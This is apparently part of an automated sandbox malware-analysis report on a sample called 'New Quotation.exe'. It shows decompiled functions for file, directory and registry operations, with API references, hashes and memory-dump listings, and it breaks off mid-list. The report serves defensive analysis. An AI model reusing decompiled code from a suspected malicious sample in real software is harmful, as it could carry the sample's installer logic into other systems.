                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                                                          0x00406031
                                                                                                                                                                                          0x0040603e
                                                                                                                                                                                          0x00406053
                                                                                                                                                                                          0x00406059

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New Quotation.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                          • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                          • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                          • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                                                                                          0x0040600d
                                                                                                                                                                                          0x00406013
                                                                                                                                                                                          0x00406018
                                                                                                                                                                                          0x00406021
                                                                                                                                                                                          0x00406021
                                                                                                                                                                                          0x0040602a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                          • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                                                                          0x00405af1
                                                                                                                                                                                          0x00405af9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405aff
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                          • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                          • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 71092B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 19%
                                                                                                                                                                                          			E71092B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x71095050 != 0 && E71092ADB(_a4) == 0) {
					 *0x71095054 = _t93;
					if( *0x7109504c != 0) {
						_t93 =  *0x7109504c;
					} else {
						E710930C0(E71092AD5(), __ecx);
						 *0x7109504c = _t93;
					}
				}
				_t28 = E71092B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E71092AFD();
					_t72 = _a4;
					_t79 =  *0x71095058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x71095058 = _t72;
					E71092AF7();
					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
					 *0x71095034 = _t33;
					 *0x71095038 = _t79;
					if( *0x71095050 != 0 && E71092ADB( *0x71095058) == 0) {
						 *0x7109504c = _t94;
						_t94 =  *0x71095054;
					}
					_t80 =  *0x71095058;
					_a4 = _t80;
					 *0x71095058 =  *((intOrPtr*)(E71092AFD() + _t80));
					_t37 = E71092AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E71092B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E71092B14() + _a4 + _v8);
							_push(E71092B1E());
							if( *0x71095050 <= 0 || E71092ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7109504c =  *0x7109504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x71095058;
					if( *0x71095058 == 0) {
						 *0x7109504c = 0;
					}
					E71092B42(_t107, _a4,  *0x71095034,  *0x71095038);
					return _a4;
				}
				_push(E71092B14() + _a4);
				_t56 = E71092B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E71092B26();
				_t87 = E71092B22();
				_t90 = E71092B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                                                                                                          0x71092ba8
                                                                                                                                                                                          0x71092bb9
                                                                                                                                                                                          0x71092bc6
                                                                                                                                                                                          0x71092bda
                                                                                                                                                                                          0x71092bc8
                                                                                                                                                                                          0x71092bcd
                                                                                                                                                                                          0x71092bd2
                                                                                                                                                                                          0x71092bd2
                                                                                                                                                                                          0x71092bc6
                                                                                                                                                                                          0x71092be3
                                                                                                                                                                                          0x71092be8
                                                                                                                                                                                          0x71092bee
                                                                                                                                                                                          0x71092c32
                                                                                                                                                                                          0x71092c32
                                                                                                                                                                                          0x71092c37
                                                                                                                                                                                          0x71092c3c
                                                                                                                                                                                          0x71092c42
                                                                                                                                                                                          0x71092c44
                                                                                                                                                                                          0x71092c4a
                                                                                                                                                                                          0x71092c57
                                                                                                                                                                                          0x71092c59
                                                                                                                                                                                          0x71092c5e
                                                                                                                                                                                          0x71092c6b
                                                                                                                                                                                          0x71092c7e
                                                                                                                                                                                          0x71092c84
                                                                                                                                                                                          0x71092c8a
                                                                                                                                                                                          0x71092c8b
                                                                                                                                                                                          0x71092c91
                                                                                                                                                                                          0x71092c9d
                                                                                                                                                                                          0x71092ca3
                                                                                                                                                                                          0x71092cab
                                                                                                                                                                                          0x71092cac
                                                                                                                                                                                          0x71092caf
                                                                                                                                                                                          0x71092cba
                                                                                                                                                                                          0x71092cbc
                                                                                                                                                                                          0x71092cc8
                                                                                                                                                                                          0x71092cce
                                                                                                                                                                                          0x71092cd6
                                                                                                                                                                                          0x71092d02
                                                                                                                                                                                          0x71092d03
                                                                                                                                                                                          0x71092d05
                                                                                                                                                                                          0x71092d09
                                                                                                                                                                                          0x71092d09
                                                                                                                                                                                          0x71092d10
                                                                                                                                                                                          0x71092ce6
                                                                                                                                                                                          0x71092ce6
                                                                                                                                                                                          0x71092ce7
                                                                                                                                                                                          0x71092cf5
                                                                                                                                                                                          0x71092cfe
                                                                                                                                                                                          0x71092cfe
                                                                                                                                                                                          0x71092cd6
                                                                                                                                                                                          0x71092cba
                                                                                                                                                                                          0x71092d12
                                                                                                                                                                                          0x71092d19
                                                                                                                                                                                          0x71092d1b
                                                                                                                                                                                          0x71092d1b
                                                                                                                                                                                          0x71092d34
                                                                                                                                                                                          0x71092d42
                                                                                                                                                                                          0x71092d42
                                                                                                                                                                                          0x71092bf9
                                                                                                                                                                                          0x71092bfa
                                                                                                                                                                                          0x71092bff
                                                                                                                                                                                          0x71092c03
                                                                                                                                                                                          0x71092c08
                                                                                                                                                                                          0x71092c1c
                                                                                                                                                                                          0x71092c1d
                                                                                                                                                                                          0x71092c1e
                                                                                                                                                                                          0x71092c20
                                                                                                                                                                                          0x71092c25
                                                                                                                                                                                          0x71092c27
                                                                                                                                                                                          0x71092c27
                                                                                                                                                                                          0x71092c2a
                                                                                                                                                                                          0x71092c30
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 71092C57
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: 65209f026cccce44af7d5b5e57cd1663fa58fd6086212f6ffef6f3cd9637c60d
                                                                                                                                                                                          • Instruction ID: 6fbca49cc36bbb42363f1e47b2ab7434cced3cb63d720b446aa4f78f0fac7b43
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65209f026cccce44af7d5b5e57cd1663fa58fd6086212f6ffef6f3cd9637c60d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F641ED73408205DFDB129FB6D8B1B8D37F9FB84B10F328466F501EA110E73A9491AB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402DA6(0xffffffd0);
				_t16 = E00402DA6(0xffffffdf);
				E00402DA6(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E00406873(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E004062FD(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                                                                                                                                                          0x00401684
                                                                                                                                                                                          0x0040168d
                                                                                                                                                                                          0x0040168f
                                                                                                                                                                                          0x00401696
                                                                                                                                                                                          0x0040169e
                                                                                                                                                                                          0x004016aa
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x004016be
                                                                                                                                                                                          0x004016c0
                                                                                                                                                                                          0x004016c5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004016c5
                                                                                                                                                                                          0x004016a0
                                                                                                                                                                                          0x004016a0
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileMove
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3562171763-0
                                                                                                                                                                                          • Opcode ID: 416424ad14324c56da6b5b470dd69dd800957d04f882025aa34f231cf59109c3
                                                                                                                                                                                          • Instruction ID: 97031ceaf8e9c96da62d10e645a43f8a4e886df5684b2e10da682d8a0e9c10a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 416424ad14324c56da6b5b470dd69dd800957d04f882025aa34f231cf59109c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3F09631A08124E6CB117BA69E4DE5E21549F82364B24063FF011B11D1D9BCC902659E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 33%
                                                                                                                                                                                          			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406484();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                                                                                                                                                          0x00402891
                                                                                                                                                                                          0x00402891
                                                                                                                                                                                          0x00402892
                                                                                                                                                                                          0x0040289a
                                                                                                                                                                                          0x0040289f
                                                                                                                                                                                          0x004028a0
                                                                                                                                                                                          0x004028af
                                                                                                                                                                                          0x004028b8
                                                                                                                                                                                          0x004028be
                                                                                                                                                                                          0x00402ba1
                                                                                                                                                                                          0x00402ba4
                                                                                                                                                                                          0x00402ba4
                                                                                                                                                                                          0x004028b8
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                                                                                                                                            • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                                                                          • Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                                                                                                                          • Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                                          0x004063e2
                                                                                                                                                                                          0x004063eb
                                                                                                                                                                                          0x00406401
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406401
                                                                                                                                                                                          0x004063ef
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                          • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                          • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                          0x004060e3
                                                                                                                                                                                          0x004060f3
                                                                                                                                                                                          0x004060fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406102
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406104

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
